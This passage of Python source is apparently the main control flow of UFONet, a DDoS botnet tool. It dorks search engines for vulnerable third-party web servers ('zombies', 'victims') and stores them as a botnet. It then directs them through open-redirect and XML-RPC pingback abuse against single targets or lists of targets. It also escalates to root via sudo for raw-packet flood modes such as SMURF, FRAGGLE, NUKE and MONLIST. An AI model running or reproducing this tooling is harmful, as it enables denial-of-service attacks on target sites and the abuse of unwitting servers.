self.exit_msg += " -> Donate BTC (Bitcoin) to keep #UFONet (https://ufonet.03c8.net) strong!"
def AI(self):
try:
import turtle as AI
print("\n[AI] Making a unique drawing using 'Turtle' (Feurzig & Papert - 1966) -> [OK!]\n")
colors = ['red', 'purple', 'blue', 'green', 'orange', 'yellow']
bg = random.choice(colors).strip()
t = AI.Pen()
AI.bgcolor(bg)
r = random.randrange(100,100000)
for x in range(r):
t.pencolor(colors[x%6])
w = random.randrange(100,1000)
t.width(x/w + 1)
t.forward(x)
l = random.randrange(50,1000)
t.left(l)
except:
print("[AI] %!$1#9#84#~... -> [Exiting!]")
pass
def round_float(self, num):
return str(int(round(num, -1)))[2] # black magic
def show_mac_address(self):
mac = getnode() # to get physical address
hex_mac = str(":".join(re.findall('..', '%012x' % mac)))
return hex_mac
def show_ips(self):
import requests
try:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect(("8.8.8.8", 80))
private_ip = s.getsockname()[0] # black magic
s.close()
except:
private_ip = "Unknown"
try:
public_ip = requests.get(self.check_ip_service3).text
except:
try:
public_ip = requests.get(self.check_ip_service2).text
except:
try:
public_ip = requests.get(self.check_ip_service1).text
except:
public_ip = "Unknown"
return private_ip, public_ip
def try_running(self, func, error, args=None):
options = self.options
args = args or []
try:
return func(*args)
except Exception as e:
if DEBUG == True:
print(error, "error")
traceback.print_exc()
def checkeuid(self):
try:
euid = os.geteuid()
except:
print("[Error] [AI] [UFONet] doesn't work correctly in systems with closed licenses...-> [Exiting!]\n")
print("[AI] "+self.exit_msg+"\n")
sys.exit(2) # return
return euid
def start_ship_engine(self):
self.agents = [] # generating available user-agents
f = open(self.agents_file)
agents = f.readlines()
f.close()
for agent in agents:
self.agents.append(agent)
self.user_agent = random.choice(self.agents).strip()
self.search_engines = [] # available dorking search engines
self.search_engines.append('bing') # [13/07/2021: OK!]
self.search_engines.append('yahoo') # [13/07/2021: OK!]
self.search_engines.append('duck') # [13/07/2021: OK!]
#self.search_engines.append('startpage') # [01/02/2020: deprecated! -> blocking instream params search]
#self.search_engines.append('yandex') # [03/02/2018: deprecated! -> captchasound]
#self.search_engines.append('google') # [09/08/2016: modified -> not working from TOR]
if not os.path.exists("core/json/"): # create gui json cfg files folder
os.mkdir("core/json/")
self.banner_welcome()
self.update_flying_stats() # update flying time stats
chargo = self.check_mothership_chargo() # check mothership chargo
self.update_max_chargo(int(chargo)) # update max chargo stats
self.generate_exit_msg() # generate random exit msg
def run(self, opts=None):
if opts:
self.create_options(opts)
options = self.options
# start threads
if not self.options.threads:
self.options.threads=5 # default number of threads
self.sem = threading.Semaphore(self.options.threads)
# start ship engine
self.start_ship_engine()
# check proxy options
proxy = options.proxy
if options.proxy:
try:
                pattern = r'http[s]?://(([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])\.){3}([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5]):[0-9][0-9][0-9][0-9]'
m = re.search(pattern, proxy)
if m is None:
self.banner()
print ("\n[Error] [AI] Proxy malformed! (ex: 'http(s)://127.0.0.1:8118') -> [Exiting!]\n")
return
else:
self.proxy_transport(options.proxy) # create proxy transport (also here, to be sure)
except Exception:
self.banner()
print ("\n[Error] [AI] Proxy malformed! (ex: 'http(s)://127.0.0.1:8118') -> [Exiting!]\n")
return
# check tor connection
if options.checktor:
url = self.check_tor_url # TOR status checking site
self.banner()
print("\nSending request to: " + url + "\n")
self.user_agent = random.choice(self.agents).strip() # shuffle user-agent
headers = {'User-Agent' : self.user_agent, 'Referer' : self.referer} # set fake user-agent and referer
try:
if options.proxy: # set proxy
self.proxy_transport(options.proxy)
req = urllib.request.Request(url, None, headers)
tor_reply = urllib.request.urlopen(req, context=self.ctx).read().decode('utf-8')
your_ip = tor_reply.split('<strong>')[1].split('</strong>')[0].strip() # extract public IP
if not tor_reply or 'Congratulations' not in tor_reply:
print("It seems that Tor is not properly set.\n")
print(("IP address appears to be: " + your_ip + "\n"))
else:
print("Congratulations!. Tor is properly being used :-)\n")
print(("IP address appears to be: " + your_ip + "\n"))
except:
print("Cannot reach TOR checker system!. Are you correctly connected?\n")
sys.exit(2) # return
# run AES256+HMAC-SHA1 enc/dec tool
if options.cryptomsg:
from core.tools.crypter import Cipher
print(" " + '='*44)
print(" ")
print(" ____...------------...____ ")
print(" _.-'' /o/__ ____ __ __ __ \o\_`'-._ ")
print(" .' / / \ \ '. ")
print(" |=====/o/======================\o\=====| ")
print(" |____/_/________..____..________\_\____| ")
print(" / _/ \_ <_o#\__/#o_> _/ \_ \ ")
print(" \__/_____\####/0213411543/####/_____\__/ ")
print(" |===\!/========================\!/===| ")
print(" | |=| .---. |=| | ")
print(" |===|o|=========/ \========|o|===| ")
print(" | | | \() ()/ | | | ")
print(" |===|o|======{'-.) A (.-'}=====|o|===| ")
print(" | __/ \__ '-.\\uuu/.-' __/ \__ | ")
print(" |==== .'.'^'.'.====|====.'.'^'.'.====| ")
print(" | _\o/ __ {.' __ '.} _ _\o/ _| ")
print(" '''''''''''''''''''''''''''''''''''''' ")
print("\n + UFONet Crypter (AES256+HMAC-SHA1)")
print(" (140 plain text chars = 69 encrypted chars)\n")
print(" " + '='*44 + "\n")
text = str(input("-> Enter TEXT: "))
input_key = str(input("\n-> Enter KEY: "))
key = base64.b64encode(input_key.encode('utf-8')).decode('utf-8')
c = Cipher(key, text)
msg = c.encrypt()
msg = msg.decode('utf-8')
c.set_text(msg)
print("\n" + " " + '-'*44)
print('\n-> Ciphertext: [', msg, ']')
print('\n-> Length:', len(msg))
print("\n" + " " + '-'*44)
print('\n-> Key (share it using SNEAKNET!):', input_key)
print('\n-> Decryption PoC:', c.decrypt().decode('utf-8'), "\n")
# run shownet tool
if options.shownet:
hex_mac = self.show_mac_address()
self.banner()
print("-> Network Info:")
print('='*44)
print("-"*35)
print("|- MAC Address :", hex_mac)
print("|" +"-"*34)
private_ip, public_ip = self.show_ips()
print("|- IP Private :", private_ip)
print("|" +"-"*34)
t = urlparse(self.check_ip_service3)
name_service = t.netloc
print("|- IP Public :", public_ip +" | ["+name_service+"]")
print("-"*35)
print('='*75, "\n")
# run UFOSCAN tool (check EUID when running UFOSCAN)
if options.xray:
euid = self.checkeuid()
if euid != 0:
print("[Info] [AI] [Control] [UFOSCAN] (--xray) not started as root...\n")
try:
args = ['sudo', sys.executable] + sys.argv + [os.environ]
os.execlpe('sudo', *args)
except:
pass # keep running
else:
if not options.xrayps:
options.xrayps = str("1-1024") # default scanning ports (1-1024)
ports = options.xrayps
try:
portX, portY = ports.split('-')
try:
portX = int(portX)
portY = int(portY)
except:
portX = 1
portY = 1024
print("[Error] [AI] [UFOSCAN] Something wrong with range of ports selected. Using by default: 1-1024...\n")
except:
portX = 1
portY = 1024
print("[Info] [AI] [UFOSCAN] Not any range of ports selected. Using by default: 1-1024...\n")
self.banner()
print("\n[AI] Analizing target to extract interesting information... Be patient!\n")
print('='*22 + '\n')
try:
self.instance = UFOSCAN() # instance main class for scanning operations
xray = self.instance.scanning(options.xray, portX, portY)
except Exception as e:
print ("[Error] [AI] Something wrong scanning... Not any data stream found! -> [Exiting!]\n")
if DEBUG == True:
traceback.print_exc()
return
# show code timeline
if options.timeline:
f = open(self.timeline_file, 'r')
releases = f.readlines()
f.close()
self.banner()
print("-> Code timeline:")
print('='*44)
print("-"*35)
for r in releases:
print(r.strip('\n'))
print("-"*35)
print('='*75, "\n")
# print some examples
if options.examples:
f = open(self.examples_file, 'r')
examples = f.readlines()
f.close()
self.banner()
for e in examples:
print(e.strip('\n'))
# check EUID when running UFOSYN (root required for open 'raw sockets') / GUI will invoke 'sudo' directly
if options.ufosyn:
euid = self.checkeuid()
if euid != 0:
print("[Info] [AI] [Control] [UFOSYN] (--ufosyn) not started as root...\n")
try:
args = ['sudo', sys.executable] + sys.argv + [os.environ]
os.execlpe('sudo', *args)
except:
pass # keep running, but UFOSYN will fail
# check EUID when running SPRAY (root required)
if options.spray:
euid = self.checkeuid()
if euid != 0:
print("[Info] [AI] [Control] [SPRAY] (--spray) not started as root...\n")
try:
args = ['sudo', sys.executable] + sys.argv + [os.environ]
os.execlpe('sudo', *args)
except:
pass # keep running, but SPRAY will fail
# check EUID when running SMURF (root required)
if options.smurf:
euid = self.checkeuid()
if euid != 0:
print("[Info] [AI] [Control] [SMURF] (--smurf) not started as root...\n")
try:
args = ['sudo', sys.executable] + sys.argv + [os.environ]
os.execlpe('sudo', *args)
except:
pass # keep running, but SMURF will fail
# check EUID when running FRAGGLE (root required)
if options.fraggle:
euid = self.checkeuid()
if euid != 0:
print("[Info] [AI] [Control] [FRAGGLE] (--fraggle) not started as root...\n")
try:
args = ['sudo', sys.executable] + sys.argv + [os.environ]
os.execlpe('sudo', *args)
except:
pass # keep running, but FRAGGLE will fail
# check EUID when running XMAS (root required)
if options.xmas:
euid = self.checkeuid()
if euid != 0:
print("[Info] [AI] [Control] [XMAS] (--xmas) not started as root...\n")
try:
args = ['sudo', sys.executable] + sys.argv + [os.environ]
os.execlpe('sudo', *args)
except:
pass # keep running, but XMAS will fail
# check EUID when running UFOACK (root required)
if options.ufoack:
euid = self.checkeuid()
if euid != 0:
print("[Info] [AI] [Control] [UFOACK] (--ufoack) not started as root...\n")
try:
args = ['sudo', sys.executable] + sys.argv + [os.environ]
os.execlpe('sudo', *args)
except:
pass # keep running, but UFOACK will fail
# check EUID when running UFORST (root required)
if options.uforst:
euid = self.checkeuid()
if euid != 0:
print("[Info] [AI] [Control] [UFORST] (--uforst) not started as root...\n")
try:
args = ['sudo', sys.executable] + sys.argv + [os.environ]
os.execlpe('sudo', *args)
except:
pass # keep running, but UFORST will fail
# check EUID when running DROPER (root required)
if options.droper:
euid = self.checkeuid()
if euid != 0:
print("[Info] [AI] [Control] [DROPER] (--droper) not started as root...\n")
try:
args = ['sudo', sys.executable] + sys.argv + [os.environ]
os.execlpe('sudo', *args)
except:
pass # keep running, but DROPER will fail
# check EUID when running OVERLAP (root required)
if options.overlap:
euid = self.checkeuid()
if euid != 0:
print("[Info] [AI] [Control] [OVERLAP] (--overlap) not started as root...\n")
try:
args = ['sudo', sys.executable] + sys.argv + [os.environ]
os.execlpe('sudo', *args)
except:
pass # keep running, but OVERLAP will fail
# check EUID when running PINGER (root required)
if options.pinger:
euid = self.checkeuid()
if euid != 0:
print("[Info] [AI] [Control] [PINGER] (--pinger) not started as root...\n")
try:
args = ['sudo', sys.executable] + sys.argv + [os.environ]
os.execlpe('sudo', *args)
except:
pass # keep running, but PINGER will fail
# check EUID when running UFOUDP (root required)
if options.ufoudp:
euid = self.checkeuid()
if euid != 0:
print("[Info] [AI] [Control] [UFOUDP] (--ufoudp) not started as root...\n")
try:
args = ['sudo', sys.executable] + sys.argv + [os.environ]
os.execlpe('sudo', *args)
except:
pass # keep running, but UFOUDP will fail
# check EUID when running NUKE (root required)
if options.nuke:
euid = self.checkeuid()
if euid != 0:
print("[Info] [AI] [Control] [NUKE] (--nuke) not started as root...\n")
try:
args = ['sudo', sys.executable] + sys.argv + [os.environ]
os.execlpe('sudo', *args)
except:
pass # keep running, but NUKE will fail
# check EUID when running TACHYON (root required)
if options.tachyon:
euid = self.checkeuid()
if euid != 0:
print("[Info] [AI] [Control] [TACHYON] (--tachyon) not started as root...\n")
try:
args = ['sudo', sys.executable] + sys.argv + [os.environ]
os.execlpe('sudo', *args)
except:
pass # keep running, but TACHYON will fail
# check EUID when running MONLIST (root required)
if options.monlist:
euid = self.checkeuid()
if euid != 0:
print("[Info] [AI] [Control] [MONLIST] (--monlist) not started as root...\n")
try:
args = ['sudo', sys.executable] + sys.argv + [os.environ]
os.execlpe('sudo', *args)
except:
pass # keep running, but MONLIST will fail
# check EUID when running SNIPER (root required)
if options.sniper:
euid = self.checkeuid()
if euid != 0:
print("[Info] [AI] [Control] [SNIPER] (--sniper) not started as root...\n")
try:
args = ['sudo', sys.executable] + sys.argv + [os.environ]
os.execlpe('sudo', *args)
except:
pass # keep running, but SNIPER will fail
# search for [Zombies] on search engines results (dorking)
if options.search:
zombies = []
if options.engine:
engine = options.engine
else:
engine = "duck" # default search engine
try:
self.banner()
if not os.path.exists(self.humans_file) == True:
f = open(self.humans_file, 'w')
f.close()
lf = open(self.humans_file, 'r')
restored = lf.readlines()
zombies_restored = len(restored)
lf.close()
lz = open(self.zombies_file, 'r')
zombies_army = lz.readlines()
for zombie in zombies_army:
zombies.append(zombie) # add zombies from army to the zombies pool
lz.close()
if len(restored) > 0:
print("\n[Info] [AI] You have [" + str(len(restored)) + " possible zombies] stored from a previous search...\n")
if not self.options.forceyes:
backup_reply = input("[AI] Do you want to resume it? (NOTE: If not, this DATA will be REMOVED) (Y/n)\n")
print('-'*25)
else:
backup_reply = "Y"
if backup_reply == "n" or backup_reply == "N":
print("\n[Info] [AI] Removing data stored and starting a new search...\n")
os.remove(self.humans_file)
zombies_restored = 0 # flush zombies restored
print('-'*25 + "\n")
else:
print("\n[Info] [AI] Restoring data and starting a new search...\n")
print('-'*25 + "\n")
for zombie in restored:
zombies.append(zombie) # add previous data to zombies pool
if options.allengines:
if options.ex_engine: # exclude some search engines manually
exclude = options.ex_engine.split(",")
for ex in exclude:
ex = ex.lower()
if ex in self.search_engines:
if len(self.search_engines) == 1: # at least one should make it
pass
else:
self.search_engines.remove(ex)
for e in self.search_engines:
engine = e
print('='*44)
print(("\n[AI] Searching for zombies using: "+engine+'\n'))
print('='*44 + '\n')
self.options.engine = engine
try:
zombies_chain = self.search_zombies(dork='', zombies_found=zombies)
if zombies_chain != None:
for zombie in zombies_chain:
if zombie not in zombies: # evade possible repetitions
zombies.append(zombie)
except:
if zombies: # backup all new zombies found to file in case of exception
for zombie in zombies:
if zombie+os.linesep not in restored: # only append new zombies found
with open(self.humans_file, "a") as f:
f.write(str(zombie+os.linesep))
else:
if restored:
print('='*44)
print(("\n[AI] Searching for zombies using: "+engine+"\n"))
print('='*44 + '\n')
if restored: # from restored file
try:
zombies_chain = self.search_zombies(dork='', zombies_found=zombies)
if zombies_chain != None:
for zombie in zombies_chain:
if zombie not in zombies: # evade possible repetitions
zombies.append(zombie)
except:
if zombies: # backup all new zombies found to file in case of exception
for zombie in zombies:
if zombie+os.linesep not in restored: # only append new zombies found
with open(self.humans_file, "a") as f:
f.write(str(zombie+os.linesep))
else:
try:
zombies = self.search_zombies(dork='', zombies_found=zombies)
except:
if zombies: # backup all new zombies found to file in case of exception
for zombie in zombies:
if zombie+os.linesep not in restored: # only append new zombies found
with open(self.humans_file, "a") as f:
f.write(str(zombie+os.linesep))
total_restored = zombies_restored
new_zombies = 0 # new zombies counter
f = open(self.zombies_file, 'r')
zz = f.readlines()
f.close()
zombies_found = []
for z in zombies:
if z.endswith(os.linesep):
z = z.replace(os.linesep, "")
if z not in zz and z+os.linesep not in zz:
new_zombies = new_zombies + 1
zombies_found.append(z)
print('='*62)
print("\n- Victims found:", len(zombies_found), "\n")
print(" - Restored:", total_restored)
print(" - Dorked:", abs(len(zombies_found) - total_restored), "\n")
print('-'*32)
print("\n- NEW possible zombies (NOT present in your army):", new_zombies, "\n")
print('='*62 + '\n')
if len(zombies) > 0:
if not self.options.forceyes:
check_backup_reply = input("[AI] Do you want to save the results for a future search? (Y/n)\n")
print('-'*25)
else:
check_backup_reply = "Y"
if check_backup_reply == "n" or check_backup_reply == "N":
if os.path.isfile(self.humans_file):
os.remove(self.humans_file) # remove search backup file (keeping love from shadows!)
print("\n[Info] [AI] Temporal data correctly removed...\n")
else:
with open(self.humans_file, "w") as f:
for z in zombies_found:
if z.endswith(os.linesep):
z = z.replace(os.linesep, "")
if z not in zz or z+os.linesep not in zz:
f.write(z+os.linesep)
f.close()
print("\n[Info] [AI] Correctly saved at: 'botnet/humans.txt'\n")
print('-'*25 + "\n")
if new_zombies and new_zombies > 0:
if not self.options.forceyes:
check_url_link_reply = input("[AI] Do you want to check if NEW possible zombies are valid? (Y/n)\n")
print('-'*25 + "\n")
else:
check_url_link_reply = "Y"
if check_url_link_reply == "n" or check_url_link_reply == "N":
print("[AI] "+self.exit_msg+"\n")
pass
else:
print("\n" + '='*44)
test = self.testing(zombies_found)
else:
print("[Info] [AI] NOT any NEW possible zombies found -> [Exiting!]\n")
except Exception:
print(("\n[Error] [AI] Something wrong searching using: "+engine+"\n"))
# search for [Zombies] from a list of [Dorks]
if options.dorks:
if options.engine:
engine = options.engine
else:
engine = "duck" # default search engine
try:
dorks = self.extract_dorks()
if not dorks:
return
zombies = []
self.banner()
if not os.path.exists(self.humans_file) == True:
f = open(self.humans_file, 'w')
f.close()
lf = open(self.humans_file, 'r')
restored = lf.readlines()
zombies_restored = len(restored)
lf.close()
lz = open(self.zombies_file, 'r')
zombies_army = lz.readlines()
for zombie in zombies_army:
zombies.append(zombie) # add zombies from army to the zombies pool
lz.close()
if len(restored) > 0:
print("\n[Info] [AI] You have [" + str(len(restored)) + " possible zombies] stored from a previous search...\n")
if not self.options.forceyes:
backup_reply = input("[AI] Do you want to resume it? (NOTE: If not, this DATA will be REMOVED) (Y/n)\n")
print('-'*25)
else:
backup_reply = "Y"
if backup_reply == "n" or backup_reply == "N":
print("\n[Info] [AI] Removing data stored and starting a new search...\n")
os.remove(self.humans_file)
zombies_restored = 0 # flush zombies restored
print('-'*25 + "\n")
else:
print("\n[Info] [AI] Restoring data and starting a new search...\n")
print('-'*25 + "\n")
for zombie in restored:
zombies.append(zombie) # add previous data to zombies pool
total_restored = zombies_restored
if options.allengines:
if options.ex_engine: # exclude some search engines manually
exclude = options.ex_engine.split(",")
for ex in exclude:
ex = ex.lower()
if ex in self.search_engines:
if len(self.search_engines) == 1: # at least one should make it
pass
else:
self.search_engines.remove(ex)
for e in self.search_engines:
engine = e
print('='*44)
print(("\n[AI] Searching for zombies using: ["+engine+ "] from a list of [Dorks]\n"))
print('='*44 + '\n')
self.options.engine = engine
for dork in dorks:
print('='*22)
print("Dork:", dork)
print('='*22 + '\n')
try:
dorked_zombies = self.search_zombies(dork, zombies) # AI mode
for zombie in dorked_zombies:
if zombie not in zombies: # evade repetitions for zombies found
zombies.append(zombie)
if zombie+os.linesep not in restored: # only append new zombies found
with open(self.humans_file, "a") as f:
f.write(str(zombie+os.linesep))
f.close()
except:
if zombies: # backup new zombies found on exception
for zombie in zombies:
if zombie+os.linesep not in restored: # only append new zombies found
with open(self.humans_file, "a") as f:
f.write(str(zombie+os.linesep))
f.close()
else:
if restored:
print('='*44)
print(("\n[AI] Searching for zombies using: ["+ engine+ "] from a list of [Dorks]\n"))
print('='*44 + '\n')
for dork in dorks:
print('='*22)
print("Dork:", dork)
print('='*22 + '\n')
try:
dorked_zombies = self.search_zombies(dork, zombies) # AI mode
if dorked_zombies != None:
for zombie in dorked_zombies:
if zombie not in zombies: # evade repetitions for zombies found
zombies.append(zombie)
except:
if zombies: # backup new zombies found on exception
for zombie in zombies:
if zombie+os.linesep not in restored: # only append new zombies found
with open(self.humans_file, "a") as f:
f.write(str(zombie+os.linesep))
f.close()
new_zombies = 0 # new zombies counter
f = open(self.zombies_file, 'r')
zz = f.readlines()
f.close()
zombies_found = []
for z in zombies:
if z.endswith(os.linesep):
z = z.replace(os.linesep, "")
if z not in zz and z+os.linesep not in zz:
new_zombies = new_zombies + 1
zombies_found.append(z)
print('='*62)
print("\n- Victims found:", len(zombies_found), "\n")
print(" - Restored:", total_restored)
print(" - Dorked:", len(zombies_found) - total_restored, "\n")
print('-'*32)
print("\n- NEW possible zombies (NOT present in your army):", new_zombies, "\n")
print('='*62 + '\n')
if len(zombies_found) > 0:
if not self.options.forceyes:
check_backup_reply = input("[AI] Do you want to save the results for a future search? (Y/n)\n")
print('-'*25)
else:
check_backup_reply = "Y"
if check_backup_reply == "n" or check_backup_reply == "N":
if os.path.isfile(self.humans_file):
os.remove(self.humans_file) # remove search backup file (keeping love from shadows!)
print("\n[Info] [AI] Temporal data correctly removed...\n")
else:
with open(self.humans_file, "w") as f:
for z in zombies_found:
if z.endswith(os.linesep):
z = z.replace(os.linesep, "")
if z not in zz or z+os.linesep not in zz:
f.write(z+os.linesep)
f.close()
print("\n[Info] [AI] Correctly saved at: 'botnet/humans.txt'\n")
print('-'*25 + "\n")
if new_zombies and new_zombies > 0:
if not self.options.forceyes:
check_url_link_reply = input("[AI] Do you want to check if NEW possible zombies are valid? (Y/n)\n")
print('-'*25 + "\n")
else:
check_url_link_reply = "Y"
if check_url_link_reply == "n" or check_url_link_reply == "N":
print("[AI] "+self.exit_msg+"\n")
pass
else:
print("\n" + '='*44)
test = self.testing(zombies_found)
else:
print("[Info] [AI] NOT any NEW possible zombies found! -> [Exiting!]\n")
except Exception:
print(("\n[Error] [AI] Something wrong searching using: "+engine+"\n"))
# auto-search for [Zombies] (dorks+all_engines+time -> to discover max new zombies)
if options.autosearch:
try:
dorks = self.extract_dorks()
except:
print("\n[Info] [AI] Not any dork present at: 'botnet/dorks.txt' -> [Aborting!]\n")
return
engines_list = self.search_engines
stop_flag = False # use a flag to establish an end
try:
self.banner()
print("\n[AI] Searching automatically for [Zombies] (WARNING: this may take several time!)\n")
print("[Info] Try to use CTRL+z (on shell) to STOP IT! ;-)\n")
print('-'*25 + "\n")
zombies_found = []
lz = open(self.zombies_file, 'r')
zombies_army = lz.readlines()
for zombie in zombies_army:
zombies_found.append(zombie) # add zombies from army to the zombies found pool
lz.close()
if not os.path.exists(self.humans_file) == True:
f = open(self.humans_file, 'w')
f.close()
lf = open(self.humans_file, 'r')
restored = lf.readlines()
zombies_restored = len(restored)
lf.close()
if len(restored) > 0:
print("[Info] [AI] You have [" + str(len(restored)) + " possible zombies] stored from a previous search...\n")
if not self.options.forceyes:
backup_reply = input("[AI] Do you want to resume it? (NOTE: If not, this DATA will be REMOVED) (Y/n)\n")
print('-'*25)
else:
backup_reply = "Y"
if backup_reply == "n" or backup_reply == "N":
print("\n[Info] [AI] Removing data stored and starting a new (auto)search...\n")
os.remove(self.humans_file)
zombies_restored = 0 # flush zombies restored
print('-'*25 + "\n")
else:
print("\n[Info] [AI] Restoring data and starting a new (auto)search...\n")
print('-'*25 + "\n")
for zombie in restored:
zombies_found.append(zombie) # add previous data to zombies found pool
total_restored = zombies_restored
while stop_flag == False:
if not os.path.exists(self.humans_file) == True:
f = open(self.humans_file, 'w')
f.close()
lf = open(self.humans_file, 'r') # read it on each iteration to update changes
restored = lf.readlines()
lf.close()
zombies_restored = len(restored)
for e in engines_list:
zombies_counter = 0 # use it also as (engine) flag
engine = e
self.options.engine = engine
print('='*44 + '\n')
print(("[AI] Searching for zombies using: "+engine+'\n'))
print('='*44 + '\n')
for dork in dorks:
print('='*22)
print("Dork:", dork)
print('='*22 + '\n')
try:
dorked_zombies = self.search_zombies(dork, zombies_found) # AI mode
for zombie in dorked_zombies:
if zombie not in zombies_found: # evade repetitions for zombies found
zombies_found.append(zombie)
if zombie+os.linesep not in restored: # only append new zombies found
with open(self.humans_file, "a") as f:
f.write(str(zombie+os.linesep))
f.close()
zombies_counter = zombies_counter + 1
except:
if zombies_found: # backup new zombies found on exception
for zombie in zombies_found:
if zombie+os.linesep not in restored: # only append new zombies found
with open(self.humans_file, "a") as f:
f.write(str(zombie+os.linesep))
f.close()
if zombies_counter == 0:
print("[Info] [AI] NOT more NEW victims found (by the moment) using: "+engine+" -> [Discarding!]\n")
print('-'*25 + "\n")
engines_list.remove(engine) # remove not more results engine from search engines list
if not engines_list: # if search engines empty, call return-exit routine
print("[Info] [AI] Search engines aren't providing more results -> [Exiting!]\n")
print('-'*25 + "\n")
stop_flag = True # exit flag up
new_zombies = 0 # new zombies counter
f = open(self.zombies_file, 'r')
zz = f.readlines()
f.close()
all_zombies_found = []
for z in zombies_found:
if z.endswith(os.linesep):
z = z.replace(os.linesep, "")
if z not in zz and z+os.linesep not in zz:
new_zombies = new_zombies + 1
all_zombies_found.append(z)
print('='*62)
print("\n- Victims found:", len(all_zombies_found), "\n")
print(" - Restored:", total_restored)
print(" - Dorked:", len(all_zombies_found) - total_restored, "\n")
print('-'*32)
print("\n- NEW possible zombies (NOT present in your army):", new_zombies, "\n")
print('='*62 + '\n')
if len(zombies_found) > 0:
if not self.options.forceyes:
check_backup_reply = input("[AI] Do you want to save the results for a future search? (Y/n)\n")
print('-'*25)
else:
check_backup_reply = "Y"
if check_backup_reply == "n" or check_backup_reply == "N":
if os.path.isfile(self.humans_file):
os.remove(self.humans_file) # remove search backup file (keeping love from shadows!)
print("\n[Info] [AI] Temporal data correctly removed...\n")
else:
with open(self.humans_file, "w") as f:
for z in all_zombies_found:
if z.endswith(os.linesep):
z = z.replace(os.linesep, "")
if z not in zz or z+os.linesep not in zz:
f.write(z+os.linesep)
f.close()
print("\n[Info] [AI] Correctly saved at: 'botnet/humans.txt'\n")
print('-'*25 + "\n")
if new_zombies and new_zombies > 0:
if not self.options.forceyes:
check_url_link_reply = input("[AI] Do you want to check if NEW possible zombies are valid? (Y/n)\n")
print('-'*25 + "\n")
else:
check_url_link_reply = "Y"
if check_url_link_reply == "n" or check_url_link_reply == "N":
print("[AI] "+self.exit_msg+"\n")
pass
else:
print("\n" + '='*44)
test = self.testing(all_zombies_found)
else:
print("[Info] [AI] NOT any NEW possible zombies found! -> [Exiting!]\n")
except Exception:
print ("[Error] [AI] Something wrong (auto)searching...\n")
# test web 'zombie' servers -> show statistics
if options.test:
try:
self.banner()
zombies = self.extract_zombies()
if not zombies:
return
test = self.testing(zombies)
self.update_missions_stats() # update mothership missions stats
except Exception:
print ("\n[Error] [AI] Something wrong testing!\n")
if DEBUG == True:
traceback.print_exc()
# test XML-'rpc' pingback vulnerable servers -> update list
if options.testrpc:
try:
self.banner()
rpcs = self.extract_rpcs()
if not rpcs:
return
testrpc = self.testing_rpcs(rpcs)
self.update_missions_stats() # update mothership missions stats
except Exception:
print ("\n[Error] [AI] Something wrong testing X-RPCs!\n")
if DEBUG == True:
traceback.print_exc()
# check botnet searching for zombies offline
if options.testoffline:
try:
self.banner()
testbotnet = self.testing_offline()
self.update_missions_stats() # update mothership missions stats
except Exception:
print ("\n[Error] [AI] Something wrong checking for offline [Zombies]!\n")
if DEBUG == True:
traceback.print_exc()
# check ALL botnet status
if options.testall:
try:
self.banner()
test_all_botnet = self.testing_all()
self.update_missions_stats() # update mothership missions stats
except Exception:
print ("\n[Error] [AI] Something wrong testing ALL botnet status!\n")
if DEBUG == True:
traceback.print_exc()
# attack target -> exploit Open Redirect massively and conduct vulnerable servers to a single target
if options.target:
try:
self.banner()
zombies = self.extract_zombies()
if not zombies:
return
options.target = self.parse_url_encoding(options.target) # parse for proper url encoding
attack = self.attacking(zombies, options.target)
self.update_missions_stats() # update mothership missions stats
except Exception:
print ("\n[Error] [AI] Something wrong attacking!\n")
if DEBUG == True:
traceback.print_exc()
# attack a list of targets -> exploit Open Redirect massively and conduct vulnerable servers to multiple targets
if options.target_list:
try:
self.banner()
zombies = self.extract_zombies()
if not zombies:
return
targets = self.extract_target_list()
if not targets:
print("\n[Error] [AI] You haven't any valid [Target] to be extracted from: "+str(options.target_list)+" -> [Exiting!]\n")
return
self.options.forceyes = True # force-yes ON!
self.num_target_list = 0
print("\n[AI] Checking integrity of targets...\n")
for t in targets: # start of code block dedicated to: Guido van Rossum [23/12/2018]
if not t.startswith("http"): # discarded inmediately
print("[Info] [AI] [Control] " + str(t) + " -> [Discarding!]")
targets.remove(t) # ¿remove? invalid targets
print("")
c = 0
for target in targets:
if target == "":
c = c + 1
else:
self.num_target_list = self.num_target_list + 1
if c == len(targets):
print("\n[Error] [AI] You haven't any valid [Target] to be extracted from: "+str(options.target_list)+" -> [Exiting!]\n")
return # end of code block dedicated to: Guido van Rossum [23/12/2018]
else:
for target in targets:
self.options.target = self.parse_url_encoding(target) # parse for proper url encoding
target = self.options.target
print('='*55 + "\n")
print("[Info] [AI] Aiming: " + str(target) + " -> [OK!]\n")
print("="*55)
attack = self.attacking(zombies, target)
self.update_missions_stats() # update mothership missions stats (each target counts)
except Exception:
print ("\n[Error] [AI] Something wrong attacking to multiple targets!\n")
if DEBUG == True:
traceback.print_exc()
# inspect target -> inspect target's components sizes
if options.inspect:
try:
self.banner()
print("\n[AI] Inspecting target for local resources... to find the best place to attack... SSssh!\n")
print('='*22 + '\n')
self.instance = Inspector(self) # instance main class for inspection operations
inspection = self.instance.inspecting(options.inspect)
self.update_missions_stats() # update mothership missions stats
except Exception as e:
print ("\n[Error] [AI] Something wrong inspecting... Not any object found!\n")
if DEBUG == True:
traceback.print_exc()
return #sys.exit(2)
# abduct target -> examine target's webserver configuration (banner grabbing, anti-ddos, etc.)
if options.abduction:
try:
self.banner()
print("\n[AI] Abducting target to extract interesting information... Be patient!\n")
print('='*22 + '\n')
self.instance = Abductor(self) # instance main class for abduction operations
abduction = self.instance.abducting(options.abduction)
self.update_missions_stats() # update mothership missions stats
except Exception as e:
print ("\n[Error] [AI] Something wrong abducting... Not any data stream found!\n")
if DEBUG == True:
traceback.print_exc()
return #sys.exit(2)
# attack me -> exploit Open Redirect massively and connect all vulnerable servers to master for benchmarking
if options.attackme:
self.mothership_id = self.mothership_id[:25] # truncating anti-formats ;-)
try:
self.banner()
print("\n[AI] Ordering [Zombies] to attack you for benchmarking ;-)\n")
print("[Warning] You are going to reveal your real IP to [Zombies]!\n")
if not self.options.forceyes:
update_reply = input("[AI] Do you want to continue? (Y/n)")
else:
update_reply = "Y"
if update_reply == "n" or update_reply == "N":
print("\n[Info] [AI] [Control] Aborting 'Attack-Me' test... -> [Exiting!]\n")
return
self.mothership_hash = str(random.getrandbits(128)) # generating random evasion hash
print("\nMothership ID: " + self.mothership_id + "RND: " + self.mothership_hash)
print("\n[AI] Checking NAT/IP configuration:\n")
